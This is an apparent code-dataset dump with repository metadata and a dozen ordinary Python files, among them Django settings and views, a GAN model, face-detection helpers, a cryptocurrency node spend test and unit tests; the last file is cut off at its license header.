blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42ae99636bef2b466a152cd47dbb195677753fcc
|
4960e3e005ba04ec0a8b0defc6642dff5e71f5ae
|
/knowledge/cron/flow4/scan_domain2sentiment.py
|
82aed86bc47562f200906949fc65791e17a4ba4e
|
[] |
no_license
|
jianjian0dandan/knowledge_revised
|
aa7d772ba9efcaa579907b0418e145d6b440a9c9
|
ffc80dcca932c977755128c80c17dca603ee8a8b
|
refs/heads/master
| 2021-01-24T18:27:41.117166 | 2017-04-25T14:55:42 | 2017-04-25T14:55:42 | 84,448,466 | 1 | 0 | null | 2017-06-15T07:32:31 | 2017-03-09T14:02:46 |
HTML
|
UTF-8
|
Python
| false | false | 1,974 |
py
|
# -*- coding:utf-8 -*-
'''
use to scan user domain to redis hash for compute sentiment
update: one month
'''
import sys
import time
from elasticsearch.helpers import scan
reload(sys)
sys.path.append('../../')
from global_utils import es_user_portrait, portrait_index_name, portrait_index_type
from global_utils import R_DOMAIN, r_domain_name
from parameter import domain_ch2en_dict
from time_utils import ts2datetime, datetime2ts
def del_domain_redis():
R_DOMAIN.delete(r_domain_name)
#use to scan user domain to redis which save as english
def scan_domain2redis():
count = 0
s_re = scan(es_user_portrait, query={'query':{'match_all':{}}, 'size':1000}, index=portrait_index_name, doc_type=portrait_index_type)
start_ts = time.time()
hmset_dict = {}
while True:
try:
scan_re = s_re.next()['_source']
count += 1
uid = scan_re['uid']
domain_en = domain_ch2en_dict[scan_re['domain']]
hmset_dict[uid] = domain_en
if count % 1000 == 0 and count != 0:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
end_ts = time.time()
print '%s sec count 1000' % (end_ts -start_ts)
start_ts = end_ts
hmset_dict = {}
except StopIteration:
if hmset_dict:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
hmset_dict = {}
break
except Exception as e:
raise e
break
if hmset_dict:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
print 'all count:', count
if __name__=='__main__':
log_time_ts = time.time()
log_time_date = ts2datetime(log_time_ts)
print 'cron/flow4/scan_domain2sentiment.py&start&' + log_time_date
del_domain_redis()
scan_domain2redis()
log_time_ts = time.time()
log_time_date = ts2datetime(log_time_ts)
print 'cron/flow4/scan_domain2sentiment&end&' + log_time_date
|
[
"[email protected]"
] | |
1d2e2eb2c10108687a1dc49559484804e918c456
|
93d700b0275bca7bbe10da7b05afb63129180327
|
/cmsplugin_rst/forms.py
|
52c718fb178b45fdcd2bb193c48470d6edaec1f1
|
[
"BSD-3-Clause"
] |
permissive
|
nwojcik/cmsplugin-rst
|
d251a4bc029b4f804ee81b8cb5a4efbe719d3270
|
afc564dc32fff5fa5e0ad7a9449088cb49737db6
|
refs/heads/master
| 2021-01-16T20:26:48.392784 | 2011-10-09T13:29:06 | 2011-10-09T13:29:06 | 2,537,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
from cmsplugin_rst.models import RstPluginModel
from django import forms
help_text = '<a href="http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html">Reference</a>'
class RstPluginForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea(attrs={
'rows':30,
'cols':80,
'style':'font-family:monospace'
}),
help_text=help_text
)
class Meta:
model = RstPluginModel
|
[
"[email protected]"
] | |
45afd3a8a7c4e27c8a14cae91ba000ca278b0c88
|
e0f13152e4575f09f0b1e4b1811726bbe5066f90
|
/tests/spend.py
|
6f12c1c3b03880c9039e75a9eab6c88f5ec189dc
|
[] |
no_license
|
yagamidev/amoveo
|
88bc0dea994fab72c9f430f838ffc54418e30abf
|
4dfd6cc8a5cb740500a873c83ff979fa521ec4e7
|
refs/heads/master
| 2021-04-09T11:45:23.697801 | 2018-03-16T09:13:35 | 2018-03-16T09:13:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 728 |
py
|
from get_request import request
def spend_test():
print("spend test")
pub = "BGRv3asifl1g/nACvsJoJiB1UiKU7Ll8O1jN/VD2l/rV95aRPrMm1cfV1917dxXVERzaaBGYtsGB5ET+4aYz7ws="
priv = "nJgWyLTX1La8eCbPv85r3xs7DfmJ9AG4tLrJ5fiW6qY="
brainwallet = ''
request(2, "load_key", [pub, priv, brainwallet], 1)
request(1, "create_account", [pub, 1], 0.1)
request(1, "sync", [[127,0,0,1], 3020], 0.1)
request(1, "spend", [pub, 2])
request(1, "spend", [pub, 3])
request(1, "spend", [pub, 1])
request(1, "spend", [pub, 1])
request(1, "sync", [[127,0,0,1], 3020], 0.1)
request(1, "mine_block", [1,100000], 0.3)
request(1, "sync", [[127,0,0,1], 3020])
if __name__ == "__main__":
spend_test()
|
[
"[email protected]"
] | |
c5c02b528246d16171faa687ec9e7fb3d4df0a74
|
039ba9dba0f131496a959338c32e811904f00708
|
/mycrm/shopcrm/shopcrm/settings.py
|
bd18f1c8d64d8efad0647ac52c6bf4b7e4fd5f5d
|
[] |
no_license
|
mageshrocky/python_django_projects
|
49e12aff8fe08704c2d17b60d5373f0990120336
|
444c30780632ceea5c6b7377356ed2c3c5ce6253
|
refs/heads/master
| 2023-05-18T11:57:01.691868 | 2021-06-15T11:18:26 | 2021-06-15T11:18:26 | 377,125,078 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,265 |
py
|
"""
Django settings for shopcrm project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kqgrn!^+k=hkp)_mxpm+9_)0w=k)b@lsjyibe$qsog*$^3%hs7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myapp.apps.MyappConfig',
'django_filters',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'shopcrm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'shopcrm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images')
|
[
"[email protected]"
] | |
93fb80555ba83304ee0774e8a8d306de3231038c
|
d8edd97f8f8dea3f9f02da6c40d331682bb43113
|
/networks439.py
|
52a3ed76800ad9bf46c5c6733e530a3fa5cc21d3
|
[] |
no_license
|
mdubouch/noise-gan
|
bdd5b2fff3aff70d5f464150443d51c2192eeafd
|
639859ec4a2aa809d17eb6998a5a7d217559888a
|
refs/heads/master
| 2023-07-15T09:37:57.631656 | 2021-08-27T11:02:45 | 2021-08-27T11:02:45 | 284,072,311 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,889 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
super().__init__()
self.ngf = ngf
self.seq_len = seq_len
self.version = __version__
# Input: (B, latent_dims, 1)
self.act = nn.ReLU()
self.lin0 = nn.Linear(latent_dims, seq_len//64*8192, bias=True)
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
self.bnu = nn.BatchNorm1d(out_channels)
self.bn1 = nn.BatchNorm1d(out_channels)
self.act = nn.ReLU()
def forward(self, x):
y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
y = self.act(self.bnu(self.convu(x)))
y = self.act(y0 + self.bn1(self.conv1(y)))
return y
self.conv1 = nn.ConvTranspose1d(8192, 6144, 4, 4, 0)
self.conv2 = nn.ConvTranspose1d(6144, 4096, 4, 4, 0)
self.conv3 = nn.ConvTranspose1d(4096, n_wires, 4, 4, 0)
self.bn1 = nn.BatchNorm1d(6144)
self.bn2 = nn.BatchNorm1d(4096)
self.bn3 = nn.InstanceNorm1d(n_wires)
self.convw1 = nn.ConvTranspose1d(n_wires, n_wires, 1, 1, 0)
#self.bnp0 = nn.BatchNorm1d(n_wires)
self.convxp = nn.ConvTranspose1d(n_wires, 256, 1, 1, 0)
self.bnp1 = nn.InstanceNorm1d(256)
self.convp2 = nn.ConvTranspose1d(256, 64, 1, 1, 0)
self.bnp2 = nn.InstanceNorm1d(64)
self.convp3 = nn.ConvTranspose1d(64, n_features, 1, 1, 0)
self.out = nn.Tanh()
def forward(self, z, wire_to_xy):
# z: random point in latent space
x = self.act(self.lin0(z).view(-1, 8192, self.seq_len // 64))
x = self.act(self.bn1(self.conv1(x)))
x = self.act(self.bn2(self.conv2(x)))
x = self.act(self.bn3(self.conv3(x)))
w = self.convw1(x)
wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)
p = self.act(self.bnp1(self.convxp(x)))
p = self.act(self.bnp2(self.convp2(p)))
p = self.convp3(p)
return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
def __init__(self, ndf, seq_len, encoded_dim):
super().__init__()
self.version = __version__
# (B, n_features, 256)
self.act = nn.LeakyReLU(0.2)
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convd = nn.Conv1d(in_channels, out_channels, 3, 2, 1)
self.act = nn.LeakyReLU(0.2)
def forward(self, x):
y = self.act(self.convd(x))
return y
self.convpxy = nn.Conv1d(n_features+2, 64, 1, 1, 0)
self.db1 = DBlock(64, 128)
self.db2 = DBlock(128, 256)
#self.conv2 = nn.Conv1d(256, 512, 3, 2, 1)
#self.conv3 = nn.Conv1d(512, 1024, 3, 2, 1)
#self.conv4 = nn.Conv1d(1024, 2048, 3, 2, 1)
#self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
self.lin0 = nn.Linear(seq_len//4*256, 1)
self.out = nn.Identity()
def forward(self, x_):
# x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
# p_ shape is (batch, features, seq_len),
# w_ is AE-encoded wire (batch, encoded_dim, seq_len)
seq_len = x_.shape[2]
x = x_
#dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)
p = x[:,:n_features]
w = x[:,n_features:n_features+2]
wg = x[:,n_features+2:]
pxy = x[:,:n_features+2]
#x = torch.cat([p, w], dim=1)
#x = self.act(self.conv0(pxy))
p = self.convpxy(x[:,:n_features+2])
#x = torch.cat([xy, xwg], dim=1)
x = p
x = self.db1(x)
x = self.db2(x)
x = self.lin0(x.flatten(1,2))
return self.out(x)#.squeeze(1)
class VAE(nn.Module):
def __init__(self, encoded_dim):
super().__init__()
class Enc(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.LeakyReLU(0.2)
self.lin1 = nn.Linear(n_wires, hidden_size)
self.lin2 = nn.Linear(hidden_size, encoded_dim)
self.out = nn.Tanh()
def forward(self, x):
x = self.act(self.lin1(x))
return self.out(self.lin2(x))
class Dec(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.ReLU()
self.lin1 = nn.Linear(encoded_dim, hidden_size)
self.lin2 = nn.Linear(hidden_size, n_wires)
def forward(self, x):
x = self.act(self.lin1(x))
return self.lin2(x)
self.enc_net = Enc(512)
self.dec_net = Dec(512)
def enc(self, x):
return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)
def dec(self, x):
return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)
def forward(self, x):
y = self.dec_net(self.enc_net(x))
return y
def get_n_params(model):
return sum(p.reshape(-1).shape[0] for p in model.parameters())
|
[
"[email protected]"
] | |
0fbcb4dace7a1a4154e9787babcc6e51e2fb5d94
|
46769b03aa33875bf4c7b1d4a2c51635a397cdfc
|
/new_test_22_dev_10089/wsgi.py
|
71a95a093114e20c8b2cd6e41198ec4cfed9c106
|
[] |
no_license
|
crowdbotics-apps/new-test-22-dev-10089
|
89b7e69c0dc0144f507ad6a0b84f06386d9a4e1c
|
ff18ba29e44581c139829607c663d731730b7bd9
|
refs/heads/master
| 2022-12-14T20:30:56.738780 | 2020-09-07T13:15:20 | 2020-09-07T13:15:20 | 293,532,502 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 419 |
py
|
"""
WSGI config for new_test_22_dev_10089 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'new_test_22_dev_10089.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
1cd44967f3be59b5da4887abb18f70c55b13da1d
|
79c1f1e1f9a123a146a314b9e4cd7f57c2301ed3
|
/visualize/CSVVsersion/SceneCSV.py
|
1fa2468f95df5ef35c99938e975a8dbef066891a
|
[
"MIT"
] |
permissive
|
ys1998/motion-forecast
|
41a1ebc553edddcf8c463d67237f53c23aa53729
|
ef8fa9d597906a756f28952a731f6bc8d178f2bf
|
refs/heads/master
| 2020-04-17T16:41:20.276427 | 2019-07-07T06:19:30 | 2019-07-07T06:19:30 | 166,751,355 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 874 |
py
|
import vtk
class SceneCSV(object):
def __init__(self):
self.sceneSources = list()
self.sceneMappers = list()
self.sceneActors = list()
self.sceneLights = list()
self.addLight(1.0, 1.0, 1.0, 1000, 1000, -1000, 0.75, 180, 0.75)
self.addLight(1.0, 1.0, 1.0, -1000, 500, 1000, 0.5, 180, 0.0)
self.addLight(1.0, 1.0, 1.0, -1000, 500,- 1000, 0.5, 180, 0.0)
def addLight(self, cR, cG, cB, pX, pY, pZ, Intensity, ConeAngle, Attenuation):
self.sceneLights.append(vtk.vtkLight())
self.sceneLights[-1].SetColor(cR, cG, cB)
self.sceneLights[-1].SetPosition(pX, pY, pZ)
self.sceneLights[-1].SetIntensity(Intensity)
self.sceneLights[-1].SetConeAngle(ConeAngle)
self.sceneLights[-1].SetShadowAttenuation(Attenuation)
self.sceneLights[-1].SetLightTypeToSceneLight()
|
[
"[email protected]"
] | |
be9f7d8b3ac111643c48d86d2142203de3228393
|
7b383cab8f9708dd9bc00c939cbab9600c0ca894
|
/UP2/NCS1/USBCam/Classes/NCS1.py
|
87c91137d99cfd455a3f827b54d10b7e35d6f62c
|
[
"MIT"
] |
permissive
|
amirunpri2018/TassAI
|
3f05b1b848d6d93fe491761589352bc0521496c3
|
3451f34d8973b67a823784e7db8fde03b274a60d
|
refs/heads/master
| 2022-12-22T06:48:46.024068 | 2020-10-01T15:43:25 | 2020-10-01T15:43:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,806 |
py
|
######################################################################################################
#
# Organization: Asociacion De Investigacion En Inteligencia Artificial Para La Leucemia Peter Moss
# Project: UP2 NCS1 Facial Recognition USB Security System
#
# Author: Adam Milton-Barker (AdamMiltonBarker.com)
#
# Title: NCS1 Class
# Description: NCS1 helper functions.
# License: MIT License
# Last Modified: 2020-09-28
#
######################################################################################################
import os, json, cv2, dlib, imutils
import numpy as np
from datetime import datetime
from imutils import face_utils
from mvnc import mvncapi as mvnc
from Classes.Helpers import Helpers
class NCS1():
""" NCS1 Class
NCS1 helper functions.
"""
def __init__(self):
""" Initializes the class. """
self.Known = []
self.Helpers = Helpers("NCS1")
self.Detector = dlib.get_frontal_face_detector()
self.Predictor = dlib.shape_predictor(
self.Helpers.confs["Classifier"]["Dlib"])
self.check()
self.load()
self.preprocess()
self.Helpers.logger.info("NCS1 class initialized.")
def check(self):
""" Checks for NCS1 device. """
#mvnc.SetGlobalOption(mvnc.GlobalOption.LOGLEVEL, 2)
devices = mvnc.EnumerateDevices()
if len(devices) == 0:
self.Helpers.logger.info(
"No Neural Compute Stick 1 devices, exiting")
quit()
self.ncs1 = mvnc.Device(devices[0])
self.ncs1.OpenDevice()
self.Helpers.logger.info("Connected to Neural Compute Stick 1")
def load(self):
""" Loads NCS1 graph. """
with open(self.Helpers.confs["Classifier"]["Graph"], mode='rb') as f:
graphFile = f.read()
self.Helpers.logger.info("Loaded NCS1 graph")
self.graph = self.ncs1.AllocateGraph(graphFile)
def preprocess(self):
""" Encodes the known users images. """
self.encoded = []
# Loops through all images in the security folder
for filename in os.listdir(self.Helpers.confs["Classifier"]["Known"]):
# Checks file type
if filename.lower().endswith(tuple(self.Helpers.confs["Classifier"]["Allowed"])):
fpath = os.path.join(
self.Helpers.confs["Classifier"]["Known"], filename)
# Gets user id from filename
user = os.path.splitext(filename)[0]
# Reads the image
raw, frame = self.prepareImg(cv2.imread(fpath))
# Saves the user id and encoded image to a list
self.encoded.append((user, self.infer(frame)))
self.Helpers.logger.info("Known data preprocessed!")
def faces(self, image):
""" Finds faces and their coordinates in an image. """
# Find faces
faces = self.Detector(image, 0)
# Gets coordinates for faces
coords = [self.Predictor(image, face) for face in faces]
return faces, coords
def prepareImg(self, frame):
""" Reads & processes frame from the local TassAI. """
# Resizes the frame
frame = cv2.resize(frame, (640, 480))
# Makes a copy of the frame
raw = frame.copy()
return raw, frame
def processImg(self, img):
""" Preprocesses an image for inference. """
dims = 160
resized = cv2.resize(img, (dims, dims))
processed = self.whiten(resized)
return processed
def whiten(self, grayscaled):
""" Creates a whitened image. """
mean = np.mean(grayscaled)
std_dev = np.std(grayscaled)
std_adjusted = np.maximum(std_dev, 1.0 / np.sqrt(grayscaled.size))
whitened_image = np.multiply(np.subtract(grayscaled, mean), 1 / std_adjusted)
return whitened_image
def infer(self, img):
""" Runs the image through NCS1. """
self.graph.LoadTensor(self.processImg(img).astype(np.float16), None)
output, userobj = self.graph.GetResult()
return output
def match(self, frame, coords):
""" Checks faces for matches against known users. """
msg = ""
person = 0
confidence = 0
# Loops through known encodings
for enc in self.encoded:
# Encode current frame
encoded = self.infer(frame)
# Calculate if difference is less than or equal to
recognize = self.compare(enc[1], encoded)
# If known
if recognize[0] == True:
person = int(enc[0])
confidence = recognize[1]
msg = "TassAI identified User #" + str(person)
break
if(person == 0):
msg = "TassAI identified an intruder"
self.Helpers.logger.info(msg)
return person, confidence
def compare(self, face1, face2):
""" Determines whether two images are a match. """
if (len(face1) != len(face2)):
self.Helpers.logger.info("Distance Missmatch")
return False
tdiff = 0
for index in range(0, len(face1)):
diff = np.square(face1[index] - face2[index])
tdiff += diff
if (tdiff < 1.3):
self.Helpers.logger.info("Calculated Match: " + str(tdiff))
return True, tdiff
else:
self.Helpers.logger.info("Calculated Mismatch: " + str(tdiff))
return False, tdiff
|
[
"[email protected]"
] | |
2de76a36c9302294182913712a4cbdbd7f90c964
|
9e1f60a867f66b1f4e4fc84fa4252c581e5e1a36
|
/Chapter09/test_state_1.py
|
e33eaec766eaab31fbfd5891365def90b52cc707
|
[
"MIT"
] |
permissive
|
PacktPublishing/Clean-Code-in-Python
|
c216e002485b8cd7736f97b59215a3930f35359a
|
7348d0f9f42871f499b352e0696e0cef51c4f8c6
|
refs/heads/master
| 2023-06-10T13:40:33.331115 | 2023-05-30T17:48:09 | 2023-05-30T17:48:09 | 145,072,942 | 523 | 181 |
MIT
| 2023-05-30T17:48:10 | 2018-08-17T04:48:38 |
Python
|
UTF-8
|
Python
| false | false | 1,489 |
py
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Test State
"""
import unittest
from state_1 import Closed, InvalidTransitionError, Merged, MergeRequest, Open
class TestMergeRequestTransitions(unittest.TestCase):
def setUp(self):
self.mr = MergeRequest("develop", "master")
def test_reopen(self):
self.mr.approvals = 3
self.mr.open()
self.assertEqual(self.mr.approvals, 0)
def test_open_to_closed(self):
self.mr.approvals = 2
self.assertIsInstance(self.mr.state, Open)
self.mr.close()
self.assertEqual(self.mr.approvals, 0)
self.assertIsInstance(self.mr.state, Closed)
def test_closed_to_open(self):
self.mr.close()
self.assertIsInstance(self.mr.state, Closed)
self.mr.open()
self.assertIsInstance(self.mr.state, Open)
def test_double_close(self):
self.mr.close()
self.mr.close()
def test_open_to_merge(self):
self.mr.merge()
self.assertIsInstance(self.mr.state, Merged)
def test_merge_is_final(self):
self.mr.merge()
regex = "already merged request"
self.assertRaisesRegex(InvalidTransitionError, regex, self.mr.open)
self.assertRaisesRegex(InvalidTransitionError, regex, self.mr.close)
def test_cannot_merge_closed(self):
self.mr.close()
self.assertRaises(InvalidTransitionError, self.mr.merge)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
2145526225efcedfd80d26083e233b193732814f
|
8ff6c3e513e17be6c51b484bed81d03150bdd175
|
/2013-01-facegif/cutface.py
|
afb58002b5ace80bf5625eccd582ac4bee62a9f2
|
[] |
no_license
|
ricbit/Oldies
|
f1a2ac520b64e43d11c250cc372d526e9febeedd
|
2d884c61ac777605f7260cd4d36a13ed5a2c6a58
|
refs/heads/master
| 2023-04-27T20:35:19.485763 | 2023-04-26T04:45:44 | 2023-04-26T04:45:44 | 2,050,140 | 40 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,089 |
py
|
import cv
import os
import sys
def DetectFaces(image):
cascade = cv.Load('haarcascade_frontalface_alt.xml')
storage = cv.CreateMemStorage(0)
return cv.HaarDetectObjects(
image, cascade, storage, 1.2, 2, cv.CV_HAAR_DO_CANNY_PRUNING)
def cut_image(image):
grayscale = cv.CreateImage(cv.GetSize(image), 8, 1)
cv.CvtColor(image, grayscale, cv.CV_BGR2GRAY)
#cv.EqualizeHist(grayscale, grayscale)
faces = DetectFaces(grayscale)
ans = []
for face in faces:
x, y, dx, dy = face[0]
cropped = cv.CreateMat(dx, dy, cv.CV_8UC1)
cv.GetRectSubPix(grayscale, cropped, (x + dx / 2, y + dy / 2))
resized = cv.CreateImage((92, 112), 8, 1)
cv.Resize(cropped, resized)
ans.append(resized)
return ans
def main():
path = sys.argv[1]
i = 0
for filename in os.listdir(path):
fullpath = os.path.join(path, filename)
print fullpath
image = cv.LoadImage(fullpath)
for cut in cut_image(image):
output = os.path.join(sys.argv[2], '%d.jpg' % i)
cv.SaveImage(output, cut)
i += 1
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
4e6ebbffaa7463d3cfd44e97df532f2dee48d07a
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2788/60595/251681.py
|
ce493d0bf81d1f4beb8b4ad066205aea69c75fcb
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 794 |
py
|
def Test():
n=int(input())
boys=eval("["+input().strip().replace(" ",",")+"]")
m=int(input())
girls=eval("["+input().strip().replace(" ",",")+"]")
z=min(m,n)
parts=[]
j=0
if(z==n):
while(j<len(girls)):
if(check(boys[0],girls[j])):
parts.append([boys[0],girls[j]])
boys.remove(boys[0])
girls.remove(girls[j])
else:
j=j+1
else:
while(j<len(boys)):
if (check(girls[0], boys[j])):
parts.append([boys[j], girls[0]])
boys.remove(boys[j])
girls.remove(girls[0])
else:
j=j+1
print(len(parts))
def check(a,b):
return abs(a-b)<=1
if __name__ == "__main__":
Test()
|
[
"[email protected]"
] | |
a4b1a60545658a8d8f78c60948c9a730f08c530f
|
2daa3894e6d6929fd04145100d8a3be5eedbe21c
|
/tests/artificial/transf_sqr/trend_constant/cycle_12/ar_/test_artificial_1024_sqr_constant_12__100.py
|
2239a2b9360d2647f6e4ca61b30fe39991f9a2e9
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Henri-Lo/pyaf
|
a1f73a0cc807873bd7b79648fe51de9cfd6c126a
|
08c968425d85dcace974d90db7f07c845a0fe914
|
refs/heads/master
| 2021-07-01T12:27:31.600232 | 2017-09-21T11:19:04 | 2017-09-21T11:19:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 310 |
py
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
dataset = tsds.generate_random_TS(N = 1024 , FREQ = 'D', seed = 0, trendtype = "constant", cycle_length = 12, transform = "sqr", sigma = 0.0, exog_count = 100, ar_order = 0);
art.process_dataset(dataset);
|
[
"[email protected]"
] | |
082a1d0a91074a3a3545799fa89ac845b5d5790b
|
bf448de248ec95325839b5e355af6982b4e5632d
|
/todo_project/testing_app/views/index.py
|
ac307f51c5dad4b28290138bc92c859ef3195724
|
[] |
no_license
|
rusalinastaneva/Python-Web-Basics
|
b459b8f47918b52654d304f3db3de54156299f66
|
ecdd72b44d4d0a1b107ef1f9fa10eb252bd4fd0e
|
refs/heads/master
| 2023-01-05T13:15:58.691511 | 2020-11-02T20:32:16 | 2020-11-02T20:32:16 | 309,486,341 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 674 |
py
|
from django.shortcuts import render, redirect
from testing_app.forms.profile import ProfileForm
from testing_app.models import Profile
def index(request):
if request.method == 'GET':
context = {
'profiles': Profile.objects.all(),
'form': ProfileForm(),
}
return render(request, 'testing/index.html', context)
else:
form = ProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect('profiles')
context = {
'profiles': Profile.objects.all(),
'form': form,
}
return render(request, 'testing/index.html', context)
|
[
"[email protected]"
] | |
b1baa37ccc2300a62d8d9375b75162e34c2989df
|
5a281cb78335e06c631181720546f6876005d4e5
|
/openstack-placement-1.0.0/placement/tests/fixtures.py
|
be235b355a8c4dee2334904091ad0f96969adaab
|
[
"Apache-2.0"
] |
permissive
|
scottwedge/OpenStack-Stein
|
d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8
|
7077d1f602031dace92916f14e36b124f474de15
|
refs/heads/master
| 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 |
Apache-2.0
| 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null |
UTF-8
|
Python
| false | false | 3,272 |
py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
